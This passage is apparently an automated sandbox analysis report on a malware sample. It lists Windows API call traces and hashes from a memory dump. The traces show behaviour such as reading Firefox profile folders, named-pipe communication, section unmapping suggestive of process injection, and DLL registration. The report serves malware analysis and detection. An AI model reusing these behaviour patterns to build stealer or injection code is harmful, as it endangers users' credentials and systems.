  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
